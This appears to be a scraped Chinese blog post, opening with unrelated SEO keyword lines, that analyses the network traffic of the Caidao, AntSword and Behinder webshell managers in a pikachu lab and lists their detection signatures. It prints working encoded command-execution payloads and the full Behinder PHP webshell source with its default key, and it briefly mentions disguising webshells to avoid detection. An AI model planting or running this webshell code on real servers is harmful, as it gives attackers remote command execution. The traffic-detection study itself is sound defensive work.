响应式网站软件网站 app 公众号先做哪个

响应式网站软件,网站 app 公众号先做哪个,新公司简介模板范文,搜索引擎推广的特点环境#xff1a;wireshark、winserver2008、pikachu 菜刀流量分析 菜刀#xff1a;一个远古的webshell工具 WSExplorer#xff1a;可以抓取某个进程的包 对于菜刀来说 要把php的版本调低一点#xff08;我是php5.5版本#xff09; 要不然会连接错误 1.wse开启对菜刀的…环境wireshark、winserver2008、pikachu菜刀流量分析菜刀一个远古的webshell工具WSExplorer可以抓取某个进程的包对于菜刀来说 要把php的版本调低一点我是php5.5版本 要不然会连接错误1.wse开启对菜刀的抓包2.菜刀连接webshell接下来就可以去分析数据包了数据包内容如下POST /vul/unsafeupload/uploads/test2.php HTTP/1.1 X-Forwarded-For: 184.49.153.29 Referer: http://192.168.1.6 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: 192.168.1.6 Content-Length: 628 Connection: Close Cache-Control: no-cache pipieval(base64_decode($_POST[z0]));z0QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3Dz1Y21kz2Y2QgL2QgIkM6XHBocHN0dWR5X3Byb1xXV1dccGlrYWNodVx2dWxcdW5zYWZldXBsb2FkXHVwbG9hZHNcIiZkaXImZWNobyBbU10mY2QmZWNobyBbRV0%3D我们重点看请求体pipieval(base64_decode($_POST[z0]));z0QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3Dz1Y21kz2Y2QgL2QgIkM6XHBocHN0dWR5X3Byb1xXV1dccGlrYWNodVx2dWxcdW5zYWZldXBsb2FkXHVwbG9hZHNcIiZkaXImZWNobyBbU10mY2QmZWNobyBbRV0%3D可以分成以下几个部分pipieval(base64_decode($_POST[z0]));pipi是密钥 拿到z0进行base64解码z0如下z0QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3Dz1如下z1Y21kz2如下z2Y2QgL2QgIkM6XHBocHN0dWR5X3Byb1xXV1dccGlrYWNodVx2dWxcdW5zYWZldXBsb2FkXHVwbG9hZHNcIiZkaXImZWNobyBbU10mY2QmZWNobyBbRV0%3D分别进行解码 先url解码 再base64解码z0z1内容为z2内容为解码之后就可以看到具体的流量了流量特征1.webshell密码 eval(base64_decode($_POST[z0]));2.ini_set(display_errors,0) 取消错误信息的回显3.set_time_limit(0)4.set_magic_quotes_runtime(0)解码之后就看到执行的命令操作了 比如cmdcd /d C:\phpstudy_pro\WWW\pikachu\vul\unsafeupload\uploads\dir 等等payload命令wireshark抓包看过滤命令ip.dst 192.168.1.6http由于报文传输时会分片传输所以要看具体的内容需要 追踪流 追踪http或者tcp流请求包我们刚刚已经解码过了 响应包是明文的所以菜刀 base64url编码很容易被解密 流量特征明显 攻击特征太明显了蚁剑流量分析用蚁剑连接websehlldefault蚁剑是可以设置编码解码器的 我们先用尝试下default过滤ip.dst 192.168.1.6http追踪流得到请求和响应数据包如下 从响应包看应该是执行的ipconfig这个命令请求包看起来是比菜刀的复杂。url解码看下还是有以下的特征1.webshell密码2.ini_set(display_errors, 0);3.set_time_limit(0)攻击特征还是挺明显的 依旧是上传了一段新代码用于实现更多的功能。并且当前版本的蚁剑默认的ua头还有很明显的特征User-Agent: Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11其他版本也有可能是antSword/v2.1尝试把蚁剑payload中的部分内容进行base64解码比如ywY2QgL2QgIkM6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJmlwY29uZmlnJmVjaG8gW1NdJmNkJmVjaG8gW0Vd但是要注意的是 蚁剑的payload会有两位混淆字符 需要删除前两位混淆字符才可以成功解码payload解码之后就可以很清晰地看到对应的命令了base64这次我们尝试base64编码 还要去自定义UA头ip.dst 192.168.1.6http过滤出数据包追踪流UA头确实变了看响应包的话应该是执行的whoami命令请求体也没有很明显的特征了mb805d7d3b0eaavPY21kobd869066f62dcQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMTI5OSIuIjliZjIiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjAzIi4iYjdkIjt9b2Jfc3RhcnQoKTt0cnl7JHA9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJtYjgwNWQ3ZDNiMGVhYSJdLDIpKTskcz1iYXNlNjRfZGVjb2RlKHN1YnN0cigkX1BPU1RbInhjNzBmZjQ4MTA3MTM4Il0sMikpOyRlbnZzdHI9QGJhc2U2NF9kZWNvZGUoc3Vic3RyKCRfUE9TVFsidWI5YWE0ZTQ0NTQwNzEiXSwyKSk7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI%2FIi1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiO2lmKHN1YnN0cigkZCwwLDEpPT0iLyIpe0BwdXRlbnYoIlBBVEg9Ii5nZXRlbnYoIlBBVEgiKS4iOi91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL3NiaW46L3Vzci9iaW46L3NiaW46L2JpbiIpO31lbHNle0BwdXRlbnYoIlBBVEg9Ii5nZXRlbnYoIlBBVEgiKS4iO0M6L1dpbmRvd3Mvc3lzdGVtMzI7QzovV2luZG93cy9TeXNXT1c2NDtDOi9XaW5kb3dzO0M6L1dpbmRvd3MvU3lzdGVtMzIvV2luZG93c1Bvd2VyU2hlbGwvdjEuMC87Iik7fWlmKCFlbXB0eSgkZW52c3RyKSl7JGVudmFycj1leHBsb2RlKCJ8fHxhc2xpbmV8fHwiLCAkZW52c3RyKTtmb3JlYWNoKCRlbnZhcnIgYXMgJHYpIHtpZiAoIWVtcHR5KCR2KSkge0BwdXRlbnYoc3RyX3JlcGxhY2UoInx8fGFza2V5fHx8IiwgIj0iLCAkdikpO319fSRyPSJ7JHB9IHskY30iO2Z1bmN0aW9uIGZlKCRmKXskZD1leHBsb2RlKCIsIixAaW5pX2dldCgiZGlzYWJsZV9mdW5jdGlvbnMiKSk7aWYoZW1wdHkoJGQpKXskZD1hcnJheSgpO31lbHNleyRkPWFycmF5X21hcCgndHJpbScsYXJyYXlfbWFwKCdzdHJ0b2xvd2VyJywkZCkpO31yZXR1cm4oZnVuY3Rpb25fZXhpc3RzKCRmKSYmaXNfY2FsbGFibGUoJGYpJiYhaW5fYXJyYXkoJGYsJGQpKTt9O2Z1bmN0aW9uIHJ1bnNoZWxsc2hvY2soJGQsICRjKSB7aWYgKHN1YnN0cigkZCwgMCwgMSkgPT0gIi8iICYmIGZlKCdwdXRlbnYnKSAmJiAoZmUoJ2Vycm9yX2xvZycpIHx8IGZlKCdtYWlsJykpKSB7aWYgKHN0cnN0cihyZWFkbGluaygiL2Jpbi9zaCIpLCAiYmFzaCIpICE9IEZBTFNFKSB7JHRtcCA9IHRlbXBuYW0oc3lzX2dldF90ZW1wX2RpcigpLCAnYXMnKTtwdXRlbnYoIlBIUF9MT0w9KCkgeyB4OyB9OyAkYyA%2BJHRtcCAyPiYxIik7aWYgKGZlKCdlcnJvcl9sb2cnKSkge2Vycm9yX2xvZygiYSIsIDEpO30gZWxzZSB7bWFpbCgiYUAxMjcuMC4wLjEiLCAiIiwgIiIsICItYnYiKTt9fSBlbHNlIHtyZXR1cm4gRmFsc2U7fSRvdXRwdXQgPSBAZmlsZV9nZXRfY29udGVudHMoJHRtcCk7QHVubGluaygkdG1wKTtpZiAoJG91dHB1dCAhPSAiIikge3ByaW50KCRvdXRwdXQpO3JldHVybiBUcnVlO319cmV0dXJuIEZhbHNlO307ZnVuY3Rpb24gcnVuY21kKCRjKXskcmV0PTA7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKGZlKCdzeXN0ZW0nKSl7QHN5c3RlbSgkYywkcmV0KTt9ZWxzZWlmKGZlKCdwYXNzdGhydScpKXtAcGFzc3RocnUoJGMsJHJldCk7fWVsc2VpZihmZSgnc2hlbGxfZXhlYycpKXtwcmludChAc2hlbGxfZXhlYygkYykpO31lbHNlaWYoZmUoJ2V4ZWMnKSl7QGV4ZWMoJGMsJG8sJHJldCk7cHJpbnQoam9pbigiCiIsJG8pKTt9ZWxzZWlmKGZlKCdwb3BlbicpKXskZnA9QHBvcGVuKCRjLCdyJyk7d2hpbGUoIUBmZW9mKCRmcCkpe3ByaW50KEBmZ2V0cygkZnAsMjA0OCkpO31AcGNsb3NlKCRmcCk7fWVsc2VpZihmZSgncHJvY19vcGVuJykpeyRwID0gQHByb2Nfb3BlbigkYywgYXJyYXkoMSA9PiBhcnJheSgncGlwZScsICd3JyksIDIgPT4gYXJyYXkoJ3BpcGUnLCAndycpKSwgJGlvKTt3aGlsZSghQGZlb2YoJGlvWzFdKSl7cHJpbnQoQGZnZXRzKCRpb1sxXSwyMDQ4KSk7fXdoaWxlKCFAZmVvZigkaW9bMl0pKXtwcmludChAZmdldHMoJGlvWzJdLDIwNDgpKTt9QGZjbG9zZSgkaW9bMV0pO0BmY2xvc2UoJGlvWzJdKTtAcHJvY19jbG9zZSgkcCk7fWVsc2VpZihmZSgnYW50c3lzdGVtJykpe0BhbnRzeXN0ZW0oJGMpO31lbHNlaWYocnVuc2hlbGxzaG9jaygkZCwgJGMpKSB7cmV0dXJuICRyZXQ7fWVsc2VpZihzdWJzdHIoJGQsMCwxKSE9Ii8iICYmIEBjbGFzc19leGlzdHMoIkNPTSIpKXskdz1uZXcgQ09NKCdXU2NyaXB0LnNoZWxsJyk7JGU9JHctPmV4ZWMoJGMpOyRzbz0kZS0%2BU3RkT3V0KCk7JHJldC49JHNvLT5SZWFkQWxsKCk7JHNlPSRlLT5TdGRFcnIoKTskcmV0Lj0kc2UtPlJlYWRBbGwoKTtwcmludCgkcmV0KTt9ZWxzZXskcmV0ID0gMTI3O31yZXR1cm4gJHJldDt9OyRyZXQ9QHJ1bmNtZCgkci4iIDI%2BJjEiKTtwcmludCAoJHJldCE9MCk%2FInJldD17JHJldH0iOiIiOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7pipi%40eval(%40base64_decode(%24_POST%5Bobd869066f62dc%5D))%3Bub9aa4e4454071ORxc70ff48107138SmY2QgL2QgIkM6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D遇到这种流量就得尝试解码了先进行url解码接下来就要进行解码了这种解码就比较复杂了 需要识别清楚这一大段编码数据的结构 分开进行解码mb805d7d3b0eaa... # 主要payload obd869066f62dc... # eval执行的代码 xc70ff48107138... # 要执行的命令 ub9aa4e4454071... # 环境变量 pipi... # 解码器指令mb805d7d3b0eaa等等这些个参数比较特殊它不是直接base64解码的而是蚁剑的混淆编码。所以这些字段直接base64解码是会乱码的。如何去看请求体中都有哪些字段通过 和 这俩符号可以确认有哪些字段比如我们要解码xc70ff48107138的值xc70ff48107138SmY2QgL2QgIkM6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ记得要删除前两位的混淆字符解码之后的攻击特征就很明显啦 执行的是whoami命令PHP RSA也可以自定义加密方式1.设置一个编码器在蚁剑的配置文件中对其设置选择编码器点击rsa配置设置公钥和私钥公钥加密私钥解密那这样我们之前的一句话密码就不能用了 复制上传蚁剑生成的webshell到服务端当然实际情况需要我们改一下代码的形式 用可变变量 匿名函数等进行一些简单的免杀连接时选择我们刚刚新建的加密方式ip.dst 192.168.1.6http过滤出数据包数据包变的更加复杂了请求包的ant是webshell的连接密码从返回包看应该是执行的whoami命令这个时候蚁剑的流量特征就几乎没了UA头被修改请求体也被改的面目全非 只有一个ant参数 但是这个ant参数名我们也是可以自定义的这种情况下 我们想把请求体内容全部解密出来就很难了因为RSA是非对称加密 没有私钥的话是没有办法进行解密的。antglaipG294DUIRwGJGRsp7IHTtvNZvhAapXtPJVt2ewZ6CCC9hfRy6onNlEK67F8XpT047ETuVIGAahzNPi5jva1qar%2B3d07TbU4RqrLYgXEEw%2FfSieAYighgcXqrizM3A9SuxD0COwr7z4H6i5Y4pCMeLaIdYwPflpLmfdzSiRk%3D%7CBmvzEePWJJvdni%2B0Wsquh9nuZdwx871ijc4VfaBsmrIHZ8y8KOvIwgTIXOE5OoctffQpz5J1ZXpm%2BTeiCIzi82tpcKYqdnTd4PW%2FQ2AD4i8zEneaBf%2Fe%2FpUJSVI7QtFBZ2TD%2BkGmHjB61Q4HsBUbqKWVM8T7hxFgLDkoeZSMUSg%3D%7CPIRqeuD%2F%2B%2Fnyrx10I61Ut2xcJkPlAM7BUpiAp4dlsEAqd%2FmdGCjSGgqYMU6ZDZrqX4hP%2Fr9xcF7r8fsvLfQct%2Bj7uoaacbLKJjTifsUj3C6wycu8CMV%2FK%2BYKgZcxOOp6vNMvWpCZ8AXmTdgmbVyz501uRuWJ22sFY5HLsUHQsOk%3D%7CX2MLa%2FkxTkMd1Ebq1zeQZQuUyuIo%2FCAgdKsfhWDAKvs1DUvs%2BDWj5I98r378QH%2F3Uk2K1rn%2FOkgGuD4qNhrVmZDqGI%2BMWvKwafnLmiFDZ6yVHbwHhoJf30Z%2F6BtKD7bv3%2FE0Ap%2FXTqWdnZsi0sBwB82gaHZsK6L%2BuNBZKbYt8Yg%3D%7Cra40zpryy%2FXrXJdwuvI55mXiDWRes9IrhprpTFKrBwkOPUe7q7N6QRlmw42Fhlh852BD4eT5a%2FBBcS6DAwGNuq0SXiWWJTgQw0%2Bu297EJY84%2F9ImIkTEMXNN5dWCmFVD8LwXbW8iaoSbvZIc0M73QMepNLZ1Usogiflr0OuTi3U%3D%7Ca%2Bmn%2FGs5u4Lv1BBMbfGVPnBLetEp18IURFCRl3X6UkbdOFS%2B2x0mGhyKRQRlUn8vSC%2FhpZRTIrcpSVj0W9Yx8iGfup1Z3dZQsOlQR4nXVgr%2FcC9R9DFpdwfa8%2BwU2muoteGhm%2BFKlGxUNH6z9Ttm%2FrW%2FoSs9ucq7mSV8uH3js90%3D%7CVmH10%2F5KtYx9NX8VpqjFb6ttihnPEP4vt%2BI26SNZRBLsTte%2B4DBLxOw4Z%2BOLTsHc8k2wsegTuV6APoOuIg0QLmVdwL%2BgmsgqS7F%2BDR8ZsdGy444J4p0LZKle%2F%2BEVsu6vqvCpzbAVzDcLIWMlTukc0lHogj08HYYjtk6erAx72tU%3D%7CAP490UGNoBmtpArif8bkm6DzRXwkGa7Ho3WKKFVb9Vpr15S3zdxEPYBNfK%2BtbsnGRwfNozlFxHXix6EqDlnYG07tXKa5n8LNVaoNauoU53lLkRwvOSlxvv2h%2FPM1rnf5uZQzY0RhR%2F%2FSD7O186ABPQ3UN5vBOppkzZJTyEeRj38%3D%7CuG32DP9i6UKqjNY5C628vwI0J5QwaOyy74fw2ec%2F70yfnZ%2BMPypvtchPFlLM7SVONi4GMOdrl9mAsYNruhgj7F3L%2BUzCxeW63sKo3xpeXizwE1kkZ4b5PsK7AHzwrb2xf7xU9tSYQmO9wOWElHN0S2BV%2Bxj0Njgx8WiyhRjeIH8%3D%7CORW78hgTR1y2iUu8Iu%2FPDZynBqlYcTNIK988rGvTpTHBKjdmmSw3q9pmMiZCGzHC7rlDY6pI1Fwmp%2F7vzlk8213pCmd43gGtPY%2BVdl0PTJpcBJVLQLP%2B7k1NLkbPqPxQZMjxV8PWlG3dNhp3J99kfFy1sFWRwKpCTvP%2FruvugOA%3D%7CAe%2BDQwlzVDjRJCxCU6m%2F%2FJ5OnyYn4s5MJtA1eXDxGKVA09IkXeLYBeKXm6sXNMTVWQ3%2BFZV8jqIQ7d3GQMSHPoA0fQYrMZzE3IGP1qV10SCduLs%2BRgE0GZS32heMFj%2FvdB0xQOZN8l3dTFZ9xtKHUwyQnnotDlpxyHHuICX0kA0%3D%7CmW8G9HJlGIOpXIOGv%2B%2BI3nlAFG3gCRB7sstYHloQ77f2SeSK3rDlGm43nTTbvYyaGDmpZRnsbtRAteffOa7j6scClN6C8r2NCRvvRAr0o67sJs8%2FHr6h%2B2G4tdnkeVlIu35ABALr%2FnODqgxEzEFzSDe6JhSXGzk7MBdxiC6bkWE%3D%7CGaIGuA38NgzAdQsdygRGnOIPW5OPs1g7JtVJUQP7o%2FbqFAJeNiSjnOIwLEtUdzgZflMIzgLLQavuYXKUducDVDuD9X%2F4LilSV937rJ6ZHh0a%2BVF4PsCiOpQPKDHR2MXRtNmJmxRHUnhn4sO%2FOWZXApypmLZjBVvhCqDfmhBj2C0%3D%7C1bRflGAbXV4cO4LV3B%2Fwh%2BeCRLDDPhwE8Q6Y%2FjbWMQF5VDwYDulAPh%2FxdPRfijin8aKyZEkDudcE9Wedf%2FRBfdUlFQ4qGXm8Dl9e034fe1sy4b8SPCwKNuzXnZuTC3L%2BMgmPi9vMvHmdzT3%2B6XUhrUv5rH5A%2F8c%2FfnnRKsoghTI%3D%7CLmABR4ryBuHryr5kfDfnpeknTbO0ytc9OvVS9su76ZbC6p%2Bd4Q%2BKzM1Gw3qItVbkncCT6gJtKhxciV%2BDgj3o7sCMXHuwL4T3UWpnpu%2BFOzy3rOf67gaFmAftBzGdqLJmU52zwTpuBdMD4ROKJjWKnMB3FHWU8f0p1U6IRButnSY%3D%7CkwaskR536aGkOOhzdJV6FInhK6IBhRvkmu%2BuEO52l5%2FMOebxBZFhD3aTKJZD%2BPW1NsTpIC6xaPIqz9gkEZUM97dLT1Ki1v5SzHFnVE%2BDWYUcYPpXvRC5Itm342ovprF9utCgAfesHO0%2Ftqr7U4ktM6jwIw0XudrSPdXp9p2oqXQ%3D%7CEShKFs5MvhmZGGdX7UO%2Bmt9PS2%2BWIt5fT6JZm9ThmCmFvE%2BG3flKa6YzquM5OpDKz7by2Ytk5Ui09h2gTdcOyOTzwPJtwzxNiYPnO936UUMpVEesIxdfpsUXrLkQF%2Fu1unfrESvjbjfjhNLIdEjq5XM9ObtVRISrIeVEXuJg5e0%3D%7CgQyFul6nuhhZbgeRJufuIqzk7CPnDiJZFQeWTzL7%2FcTLdGa8UsHBPsLQ4V5zrqGV0ndlCmMCwEk7%2Fy8uBg5bMQSY7UaLwTaOM0Q99zflAjpdkr6aRcAcTANta6bbkAkK2ic2zczGcegiaEsxYWvkbamehoT0JRwuVua%2FPjuTnTk%3D%7CM6pnUkgSoxSRlQRufZ6u771Y5o75%2F05rTJ82JVt8WzZ0KY%2BfzdDv9D%2FH9iAQsdabVAExrpaGB4LseSrD8m4LNRXpiO%2FH12oI0BYgumEuTjoXxKLo%2BMcMTELMMUiCrjKnpj9uSoliC9d%2FQCYqE12U%2B8mv1SDiwhJ9WgFGxp4Hcig%3D%7CalfavTQT2UyiXubnLjkbvgD0zEZrcFgCaE4cvrQyblXKqGsb%2BItJEfLs4UPGPODQfGyK3H%2BpY8h9lGgB5yyVeNY04D4QZ%2FBREw%2ByQFNsrMPMmVNzehRS5L8LQjCGdoBc4KJhobztks1%2B7BzOqq978uNEyhPsBkpotcqmDEKBo1I%3D%7Cr0fszAZB7XLO1xWW3d91rlLtuy3BJcpyAOnejj1qq2k8atdXKjJssjnrxrSdby5imvDY%2B2tAvCcmtpDJFwUa37RoTbRtHmKzBrDzmtt6ns3W%2BtgvdnZ9jFcVDxSwJ062ZwWxNh3NmAnOYqMNM9lz2uxsP3Xl9MLiUA1wIPzldR0%3D%7CscIDfF3XTyzrynT1v3urZVWl2OMxAqbElF12alfXgFZQdzAUNtIS2BOFhgWM692mHdHXVI%2FS75orm6OrNMt7ujDqPskKjQni5lcDqdAKR1qDNAtZPkLThtHvA2jEomGqpH76bdsAoyKYPnrMAq8sB0ywHhUy4Qk6pikl10xZn9E%3D%7ChQMbYqS%2BOjnz0sbg5r6SsDY2jfssnQGZCNHAQ4am2%2BZiD8T754p4pFdrgyIyGJNdwieD%2FAVlXLlFcoYYnIbYXLNybYlwXlCIIiepVoYfTlnuWJqs%2BOxw6Ba3dqsne3dhrprR%2BQ%2Bt26o2SQ0y%2FzPz%2Buu%2F3RuHBfvBGuZ6HmcrdFk%3D%7Cyow1P35AL7piIV3ivQhPGMtKJjCgLktWfCgY2YkFWZc5ffaU7gsDofn9O5ZRn0FEgblRHzEOvfoLZXz6dUMTHTm%2F6Q%2Fyh7EbIJA7aXG09%2Bqa52INDGayMcHPTcUq54Lai7ogrd5GG6p0btykk43NXRe5Y0w3hO1TK03dDH9nJ5U%3D%7CTmdZWN5gN00z%2FUq1QGxRYkqE%2BZBGHVSpEM2zqP%2Bm7O%2F1QoOmU5PVa5yM7gB73eWQ%2BBN04f0AmpLNj1qXnsYHHoSC%2BHuZ9DqBQVyFwDHULpz7zyG4rzncbZLZwJr8hBYcdjcsDx63j%2Bm68DsxpnV9S%2BmpEo7zoK36B%2F5l3T%2F9G1Y%3D%7Ch353Dc%2Bb8%2FFni7B5Lqtrq90PISIEsdzjHNQv44ItXogcF34qkV%2BqNs%2B%2Fhv1yfcJpm9KG%2FPJp%2B60Z6UzzWrGt2RqNUt8rqDfVJOKrn7g9bK1xEe5W4cQg%2BRM7k5gw%2F4H%2BiGU0AYDbmqfZHaKVXYXxeRmIy6tkjip8IlJyFpFh6BA%3D%7CNz6X4m7RAovo%2FwYOMa17%2FAdc0Qek0nikS%2B9gxieIVeJXhMm%2Fa5%2BwUZnDKuPESH4zWthxCHjdcfgvNme0Qyn%2FsdNaFc8X5WJ810rrCS6K25fwy3XggwrYJm%2FDFCSa3GG%2FaFKF5KV3%2Fw3ZqSDOwSg7iC%2FS5pc4tbURkoqW5FCteUo%3D%7CF8WscMxYK6zh%2FGjoPFFCgOIsjAr6%2Ftwo%2BZtThgoeJa%2Bh9hl6Up4TwSWm8zIytE68gNCqMY7BItKPgVmwSQqh48VUKDkXcrney1ifFupx5ZHyRd5nSOnCwH2dCc91EqpSdHVujG4uaTpRvwfA9p3HSyGpYSHUKQfSC%2BVIMm1wThY%3D%7Cicn5CN2%2BPM8UPoW0PbqG88p7JKdjAP3lOaI4GQ0mRf%2F6lW6PNW1p4cmC8iIeY1sYefIUHpcOI1gPKxgfngF3Yu8zZ1HsQbWykewPm9E6x3gtfhvF8OLabTQFBNATmiyZlSrQ0LAQLWlSdldqaHOcXe6ibCt68IsnKO4ny2cZOwU%3D%7Cn3RL4VYWDGCL0caSyuzAao%2B%2Fo5l5wXdCeWO4hq0D2GA5Dw%2FX2PIe3dPpoOnHvkwhZYEqfbIrXV0hWbAyyibH4bsuwK%2BY%2BPMhL%2FXPkeNBJLO%2BH7aT0vrihmIZ36iwZZUgW4VgB%2BQCVXif88Y6%2FXHXqz6DOXmml7sVG6mz%2B5N5OZw%3D%7CnIw3puVakignv1S9w6yjpTul9Jx7FL0uIr0QC4Wa4lzNfCibAUwk6cJCTxEcPphI558xC%2F9aVUxp1znsbQK0ScBnDPczUQve%2BQ5f0axhedDC%2FDh1tpj0bUbPBq7xDGx%2FfcwNxYHd%2Br9kjDsmJTkVdwuL5pG28X2BJ3B6pSQ0AGg%3D%7CIJB4f%2Fv%2FV36q1r1SrmNk8T2NTsrL8nhfRupMjijcBY%2Bw5v%2FrSG81D9j%2BG4KhMmmwI5snvsDtB5gybVAygp2CKOPakABDIbwXPeUUzZDUWgvDBLAUU3wZ3keQs14s705eCSmPk8tafibJthvA%2FQTCC43V%2FQ10Unqv6Yyh5fY%2Bk00%3D%7CLLqBr1bhu70jIjj6FnKw7TukxY%2BCPO74nab0nrYM9%2F3luLCNoytL8xL7bfbLHKiXS18BDR3dmuzFnvVnFMSSmspWG5htZCm%2B9w6vxh3NbLknII3Reijdr%2FnoIrAEXSiuMqv%2BRtvWEvt6IYvv3NX4Xz3PPwXxLpiye3f4Glmegbs%3Dfb5c4bef4cbed7ImY21kp7e9737bacc81aogY2QgL2QgIkM6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3Du1c5fc071f45b1km但是并不是所有的字段都被RSA加密了如何去看请求体中都有哪些字段通过 和 这俩符号可以确认有哪些字段下面是两个字段 一个是p7e9737bacc81a 另一个是u1c5fc071f45bap7e9737bacc81a 字段可以按照之前的老方法先url解码再去掉前两位混淆字符 进行base64解码解出来。p7e9737bacc81aogY2QgL2QgIkM6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D冰蝎流量分析冰蝎3.0流量分析冰蝎属于是一个功能强大的webshell管理工具它有自带的payload我们只需要将后门文件放到服务器上即可执行功能冰蝎相比之前的webshell流量更加安全隐蔽而且功能更加强大如设置转发反弹shell等。将冰蝎的server目录下的php的webshell上传至pikachushell.php文件内容如下?php error_reporting(0); session_start(); $keye45e329feb5d925b; //该密钥为连接密码32位md5值的前16位默认连接密码rebeyond $_SESSION[k]$key; session_write_close(); $postfile_get_contents(php://input); if(!extension_loaded(openssl)) { $tbase64_.decode; $post$t($post.); for($i0;$istrlen($post);$i) { $post[$i] $post[$i]^$key[$i115]; } } else { $postopenssl_decrypt($post, AES128, $key); } $arrexplode(|,$post); $func$arr[0]; $params$arr[1]; class C{public function __invoke($p) {eval($p.);}} call_user_func(new C(),$params); ?可以看到数据的加密密码 $keye45e329feb5d925b 是rebeyond字符串md5值的前16位数据采用AES128方式加密 AES是对称加密 加密解密密钥一致 所以解密时也可以尝试下 e45e329feb5d925b打开冰蝎连接webshell 同时用wireshark抓包可以看到 冰蝎的功能有很多除了进行命令执行 还可以内网穿透 反弹shell等等ip.dst 192.168.1.6http过滤出数据包追踪数据流发现一共有三组请求响应包 并且请求和响应包均有加密 看不到明文accept头里有text/html,application/xhtmlxml这个可以算的上是个弱特征了这对应着冰蝎攻击执行的三个阶段第一阶段身份验证与基本信息获取密钥传递阶段3.0使用了预共享。第二阶段能力协商与信道建立算法协商阶段加密算法一般为AES128和异或。第三步正式通讯实际命令执行阶段。客户端使用上述密钥加密payloadPOST给服务端服务端解密后执行将结果又以加密方式作为Response Body返回给客户端。我们看一下第三组包的响应包 确认一下是执行的哪个命令mAUYLzmqn5QPDkyI5lvSp0fjiBu1e7047YjfczwY6j4pkeHSsgU46C3iuKGbrtvkNEuu1DU6z/UpsypyzUYaR/q1G2FEiTW6lz3/gWiEPE冰蝎加密流程为先base64编码 